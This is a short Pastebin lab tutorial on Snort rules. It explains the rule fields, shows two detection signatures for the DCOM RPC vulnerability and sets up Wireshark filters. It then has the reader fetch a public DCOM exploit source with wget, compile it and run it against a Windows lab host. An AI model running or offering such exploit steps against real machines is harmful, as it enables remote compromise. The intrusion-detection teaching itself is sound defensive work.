Advertisement
joemccray

Quick Snort Rule Demo

Mar 12th, 2019
466
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.00 KB | None | 0 0
  1. #############################
  2. # Understanding Snort rules #
  3. #############################
  4. Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
  5.  
  6. Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
  7.  
  8. Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
  9.  
  10. Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  11.  
  12. Field 5: Traffic Direction (->)
  13.  
  14. Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
  15.  
  16. Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  17.  
  18. Field 8: MSG - what is actually displayed on the analysts machine
  19.  
  20.  
  21. Let's look at 2 simple rules
  22. ----------------------------------------------------------------------------------
  23. alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator \
  24. bind attempt”; flow:to_server,established; content:”|05|”; distance:0; within:1; \
  25. content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 \
  26. 00 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; \
  27. reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
  28.  
  29. alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind \
  30. attempt”; flow:to_server,established; content:”|FF|SMB|25|”; nocase; offset:4; \
  31. depth:5; content:”|26 00|”; distance:56; within:2; content:”|5c \
  32. 00|P|00|I|00|P|00|E|00 5c 00|”; nocase; distance:5; within:12; content:”|05|”; \
  33. distance:0; within:1; content:”|0b|”; distance:1; within:1; \
  34. byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
  35. 46|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
  36. sid:2193; rev:1;)
  37. ----------------------------------------------------------------------------------
  38.  
  39.  
  40.  
  41. From your Linux machine ping your Windows machine
  42. ---------------------------Type This-----------------------------------
  43. ping 192.168.150.1
  44. -----------------------------------------------------------------------
  45.  
  46.  
  47. Start wireshark and let's create some simple filters:
  48.  
  49. Filter 1:
  50. ip.addr==192.168.150.1
  51. -----------------------------------------------------------------------
  52.  
  53. Filter 2:
  54. ip.addr==192.168.150.1 && icmp
  55. -----------------------------------------------------------------------
  56.  
  57.  
  58. Filter 3:
  59. ip.addr==192.168.150.1 && !(tcp.port==22)
  60. -----------------------------------------------------------------------
  61. Now stop your capture and restart it (make sure you keep the filter)
  62.  
  63.  
  64.  
  65.  
  66. Back to your Linux machine:
  67. [ CTRL-C ] - to stop your ping
  68.  
  69. wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
  70.  
  71.  
  72. gcc -o exploit oc192-dcom.c
  73.  
  74. ./exploit
  75.  
  76.  
  77. ./exploit -d 192.168.150.1 -t 0
  78. -----------------------------------------------------------------------
  79.  
  80.  
  81.  
  82. Now go back to WireShark and stop the capture.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement